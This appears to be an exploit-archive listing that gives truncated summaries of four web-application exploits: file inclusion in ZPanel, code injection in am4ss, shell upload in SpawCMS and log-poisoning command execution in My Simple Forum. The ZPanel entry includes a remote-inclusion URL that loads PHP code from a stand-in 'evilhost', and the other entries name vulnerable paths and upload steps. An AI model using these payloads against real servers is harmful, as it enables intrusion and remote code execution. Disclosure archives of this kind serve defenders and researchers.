ZPanel <= 2.5 - Remote SQL Injection Exploit

No description provided by source. Tested and working /str0ke It is possible to include arbitrary file: local - in version ZPanel = 2.5 beta 10, remote - in ZPanel 2.0. exploit for v 2.0 http://localhost/zpanel/zpanel.php?page=http://evilhost/shell where http://evilhost/shell.php - evil php code...

am4ss Support System 1.2 PHP Code Injection Exploit

Exploit for php platform in category web applications 10/2011 , Vulnerability discovered till now , i haven't reported the vendor , why!!! The idiot backdoored it by himself + the official site is fucked up ; 19/07/2012 , Public Disclosured C:\labphp am4ss.php localhost /lab/am4ss/...

SpawCMS Editor Shell Upload Vulnerability

Exploit for unknown platform in category web applications ========================================= SpawCMS Editor Shell Upload Vulnerability ========================================= just go to directory http:/server/path/spaw/demo.php then use image Upload, select all filetypes, and You can...

My Simple Forum 7.1 (LFI) Remote Command Execution Exploit

No description provided by source. !/usr/bin/perl My Simple Forum v7.1 Remote Command Execution Exploit Apache Log Poisoning/Injection Local File Inclusion at /theme/default/index.template.php?action=lf%00 XSS at /theme/default/index.template.php?Name=XSS - This needs Register Globals ON Credits ...